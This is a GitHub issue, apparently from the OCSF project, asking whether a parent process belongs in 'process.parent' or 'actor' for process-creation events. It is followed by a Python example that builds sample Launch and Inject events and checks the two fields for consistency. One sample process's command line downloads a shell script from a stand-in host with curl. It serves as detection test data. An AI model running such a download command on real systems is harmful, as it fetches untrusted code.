Clarification on Proper Placement of Parent Process Details in Process Event (ACTOR vs PROCESS.PARENT) #1187

Open
threatdecoder opened this issue Oct 1, 2024 · 0 comments

Description:

I have a question regarding the appropriate placement of parent process details in OCSF for process events, specifically in the case of process creation events with activity_id set to 1.

The current schema has two fields that could potentially be used to store details about the parent process:

  • process.parent: As per the OCSF documentation, this field is explicitly designed to capture information about the parent process (i.e., the process that spawned the current process).

  • actor: According to the description of the actor field, it represents "the actor that performed the activity on the target process. For example, the process that started a new process or injected code into another process."

Given this, there seems to be overlap between the two fields when it comes to process creation events, where the parent process can be considered both the "actor" (initiating entity) and the hierarchical parent.

Doubt/Clarification:

  1. Should the parent process be stored exclusively in the process.parent field in process creation events to adhere to a more hierarchical approach, or is it acceptable to also store the parent process details in the actor field?

  2. For clarity and standardization, should we exclusively reserve the actor field for other entities like code injection or external actors (e.g., a remote machine or user) that perform actions on processes?

  3. If we are to store the parent process details in the actor field, would this create confusion, since the process.parent field exists for that specific relationship? Is there a scenario where both fields should contain the parent process details?

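The three questions above turn on whether `actor.process` and `process.parent` describe the same process. The Python below is an added example written for this page; it is not code from the issue author or from the OCSF project. It builds a Launch event in the two shapes the issue contrasts (parent only in `process.parent`, or duplicated into `actor.process`), builds an Inject event where the two fields legitimately differ, and adds a small consistency check a detection pipeline could run. The numeric identifiers (class_uid 1007 Process Activity, category_uid 1 System Activity, activity_id 1 Launch / 4 Inject, type_uid = class_uid * 100 + activity_id), the schema version string and the sample processes are this example's assumptions and should be verified against the OCSF schema version you target.

```python
"""Added example, not taken from the issue or from the OCSF project: build OCSF
Process Activity events and check how `actor.process` relates to
`process.parent`.  The numeric identifiers below are taken from the OCSF
schema as this example's author reads it and should be verified against the
schema version you target."""
import copy
import json

CLASS_UID_PROCESS_ACTIVITY = 1007   # assumption: OCSF Process Activity class
CATEGORY_UID_SYSTEM_ACTIVITY = 1    # assumption: OCSF System Activity category
ACTIVITY_LAUNCH = 1                 # assumption: activity_id for process creation
ACTIVITY_INJECT = 4                 # assumption: activity_id for code injection
SCHEMA_VERSION = "1.3.0"            # assumption: pin to the version you validate against

# Constructed sample processes (not real telemetry).
SAMPLE_PARENT = {"pid": 4242, "uid": "proc-4242", "name": "bash",
                 "cmd_line": "/bin/bash -l"}
SAMPLE_CHILD = {"pid": 4243, "uid": "proc-4243", "name": "curl",
                "cmd_line": "curl -s http://203.0.113.10/x.sh"}
SAMPLE_INJECTOR = {"pid": 5555, "uid": "proc-5555", "name": "injector",
                   "cmd_line": "./injector --target 4243"}


def _base_event(activity_id, time_ms):
    """Envelope shared by both event shapes."""
    return {
        "category_uid": CATEGORY_UID_SYSTEM_ACTIVITY,
        "class_uid": CLASS_UID_PROCESS_ACTIVITY,
        "activity_id": activity_id,
        "type_uid": CLASS_UID_PROCESS_ACTIVITY * 100 + activity_id,
        "time": time_ms,
        "metadata": {"version": SCHEMA_VERSION,
                     "product": {"name": "example-sensor"}},  # constructed
    }


def build_launch_event(parent, child, time_ms, actor_is_parent=True):
    """Process creation (activity_id 1).  The new process is `process` and its
    parent always goes in `process.parent`.  With actor_is_parent=True the same
    parent object is also placed in `actor.process` (the 'both fields'
    convention the issue asks about); with False, `actor` is omitted."""
    event = _base_event(ACTIVITY_LAUNCH, time_ms)
    event["process"] = copy.deepcopy(child)
    event["process"]["parent"] = copy.deepcopy(parent)
    if actor_is_parent:
        event["actor"] = {"process": copy.deepcopy(parent)}
    return event


def build_inject_event(injector, target, target_parent, time_ms):
    """Code injection (activity_id 4).  The actor is the injecting process,
    which is NOT the target's parent, so the two fields legitimately differ."""
    event = _base_event(ACTIVITY_INJECT, time_ms)
    event["process"] = copy.deepcopy(target)
    event["process"]["parent"] = copy.deepcopy(target_parent)
    event["actor"] = {"process": copy.deepcopy(injector)}
    return event


def parent_actor_relation(event):
    """Classify how actor.process relates to process.parent.
    Returns one of: 'parent_missing', 'actor_missing', 'same', 'different'.
    Processes are compared by (pid, uid) so a pid reuse with a different
    process uid is reported as 'different'."""
    parent = event.get("process", {}).get("parent")
    actor_proc = event.get("actor", {}).get("process")
    if parent is None:
        return "parent_missing"
    if actor_proc is None:
        return "actor_missing"

    def key(p):
        return (p.get("pid"), p.get("uid"))

    return "same" if key(actor_proc) == key(parent) else "different"


def suspicious_launch(event):
    """Detection-side check: a Launch event whose actor is populated but does
    not match process.parent is inconsistent telemetry and worth flagging."""
    return (event.get("activity_id") == ACTIVITY_LAUNCH
            and parent_actor_relation(event) == "different")


if __name__ == "__main__":
    launch = build_launch_event(SAMPLE_PARENT, SAMPLE_CHILD, 1727740800000)
    inject = build_inject_event(SAMPLE_INJECTOR, SAMPLE_CHILD, SAMPLE_PARENT,
                                1727740801000)
    for ev in (launch, inject):
        print(ev["type_uid"], parent_actor_relation(ev), suspicious_launch(ev))
        print(json.dumps(ev, indent=2))
```

The Inject case is the practical argument for keeping `process.parent` separate from `actor`: the injector is the entity performing the action, but the target's hierarchical parent is unchanged. For Launch events, whichever convention a producer picks, a consumer can only rely on `process.parent` being present, so detections that walk the process tree should read that field and treat `actor.process` as optional.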